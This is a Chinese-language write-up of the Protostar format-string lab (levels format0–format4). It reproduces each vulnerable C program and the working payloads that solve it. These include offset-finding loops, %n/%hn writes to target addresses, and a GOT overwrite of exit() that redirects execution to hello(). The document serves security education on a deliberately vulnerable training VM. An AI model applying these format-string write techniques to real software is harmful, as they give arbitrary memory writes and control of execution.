Protostar Format 0-4 Write-up

Format 0

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void vuln(char *string)  
{
  volatile int target;
  char buffer[64];

  target = 0;

  sprintf(buffer, string);

  if(target == 0xdeadbeef) {
    printf("you have hit the target correctly :)\n");
  }
}

int main(int argc, char **argv)  
{
  vuln(argv[1]);
}

Format string exploit

/opt/protostar/bin/format0 %64d`python -c ‘print(“\xef\xbe\xad\xde”)’`

Format 1

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int target;

void vuln(char *string)  
{
  printf(string);

  if(target) {
    printf("you have modified the target :)\n");
  }
}

int main(int argc, char **argv)  
{
  vuln(argv[1]);
}

找target地址

 objdump -t /opt/protostar/bin/format1 | grep target

查找偏移量

for i in {1..200};do echo "trying offset $i - `/opt/protostar/bin/format1 DDDD%$i\\$08x`"; done | grep DDDD44444444

构造payload

/opt/protostar/bin/format1 `python -c ‘print(“\x38\x96\x04\x08”)’`%132\$08n

Format 2

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int target;

void vuln()  
{
  char buffer[512];

  fgets(buffer, sizeof(buffer), stdin);
  printf(buffer);

  if(target == 64) {
    printf("you have modified the target :)\n");
  } else {
    printf("target is %d :(\n", target);
  }
}

int main(int argc, char **argv)  
{
  vuln();
}

首先查找target地址

objdump -t /opt/protostar/bin/format2 | grep target

查找偏移为4

for i in {1..200};do echo DDDD%$i\$08x > temp; echo "trying offset $i - `/opt/protostar/bin/format2 < temp`"; done | grep DDDD44444444

python -c “print ‘\xe4\x96\x04\x08’+’%4\$n'” | /opt/protostar/bin/format2

 python -c “print ‘\xe4\x96\x04\x08’+’A’*60+’%4\$n'” | /opt/protostar/bin/format2

Format 3

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int target;

void printbuffer(char *string)  
{
  printf(string);
}

void vuln()  
{
  char buffer[512];

  fgets(buffer, sizeof(buffer), stdin);

  printbuffer(buffer);

  if(target == 0x01025544) {
    printf("you have modified the target :)\n");
  } else {
    printf("target is %08x :(\n", target);
  }
}

int main(int argc, char **argv)  
{
  vuln();
}

查找target地址

查找偏移量

Target == 0x01025544,将其分成两部分 0x0102和0x5544

0x0102 = 258

0x5544 = 21828

将两个地址先写入 \xf6\x96\x04\x08  \xf4\x96\x04\x08 共占8 bytes,所以后边的偏移量为

Offset(0x0102) = 258 – 8 = 250

Offset(0x5544) = 21828 – 258 = 21570

使用%hn控制写入两个bytes

构造exp,注意地址先是\xf6,然后\xf4,偏移先0x0102,然后0x5544

echo `python -c “print ‘\xf6\x96\x04\x08\xf4\x96\x04\x08′”`%250x%12\$hn%21570x%13\$hn | /opt/protostar/bin/format3

中间有大段的空格,最后显示结果

Format 4

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int target;

void hello()  
{
  printf("code execution redirected! you win\n");
  _exit(1);
}

void vuln()  
{
  char buffer[512];

  fgets(buffer, sizeof(buffer), stdin);

  printf(buffer);

  exit(1);
}

int main(int argc, char **argv)  
{
  vuln();
}

Hello()函数没有被调用的地方,漏洞触发在printf()处,之后调用exit(1),所以需要将exit()函数的返回地址覆盖为hello()地址,使用objdump查找hello函数,以及GOT表查找exit

查找偏移为4

需要将exit返回地址0x08049724处覆盖为hello地址0x080484b4,根据format3的方法,将此地址分成两部分

0x0804 = 2052

0x84b4 = 33972

计算偏移

0x0804 – 8 = 2052 – 8 = 2044

0x84b4 – 0x0804 = 33972 – 2052 = 31920

构造exp

echo `python -c “print ‘\x26\x97\x04\x08\x24\x97\x04\x08′”`%2044x%4\$hn%31920x%5\$hn | /opt/protostar/bin/format4

输出一大串空格之后,返回成功

您可能还喜欢...